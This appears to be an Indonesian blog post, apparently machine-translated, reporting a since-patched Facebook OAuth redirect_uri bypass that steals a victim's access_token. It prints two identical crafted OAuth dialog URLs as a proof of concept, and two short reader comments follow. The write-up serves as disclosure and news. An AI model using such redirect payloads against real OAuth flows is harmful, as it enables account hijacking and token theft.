Dalam beberapa bulan White hat Hacker terakhir, 'Nir Goldshlager' melaporkan banyak bug kritis di Facebook mekanisme OAuth, yang memungkinkan penyerang untuk membajak account Facebook tanpa interaksi pengguna
Sebelum membaca lebih jauh, saya ingin menyarankan Anda untuk membaca posting berikut untuk memahami mekanisme eksploitasi dasar:
Sekarang, jika Anda sadar tentang kerentanan digunakan untuk melawan Facebook OAuth dalam parameter redirect_uri dalam URL, ada cara lain yang Amine Cherrai ditemukan, untuk memotong patch yang diterapkan oleh tim keamanan Facebook
Dia menemukan file lain di Facebook, yang memungkinkan pengalihan untuk mencuri access_token rekening korban. yaitu http://facebook . com/connect/xd_arbiter.php? # & origin= http://facebook . com/ ”. Eksploitasi sukses sekali lagi diperbolehkan hacker untuk membajak account Facebook menggunakan OAuth Flaw.
Bukti dari konsep
http://facebook.com/dialog/oauth?client_id=350685531728&response_type=token&display=page&redirect_uri=http%3A%2 %2Ftouch.facebook.com%2Fconnect%2Fxd_arbiter.php%3F%23%21%2Fapps%2Fmidnighthack%2F%3F%26origin%3Dhttp%3A%2F%2Ffacebook.com%2F
http://facebook.com/dialog/oauth?client_id=350685531728&response_type=token&display=page&redirect_uri=http%3A%2 %2Ftouch.facebook.com%2Fconnect%2Fxd_arbiter.php%3F%23%21%2Fapps%2Fmidnighthack%2F%3F%26origin%3Dhttp%3A%2F%2Ffacebook.com%2F
By the way bug ini ditutup oleh Facebook Security Team beberapa hari kembali dan akun sosial Anda sekali lagi dijamin, sampai temuan berikutnya
Postingan mu sangat bagus sekali gan.. Informative dan memberikan manfaat bagi banyak orang. Thanks for sharing and thank you
ReplyDeletethanks gan,,, atas komentarnya.....
ReplyDelete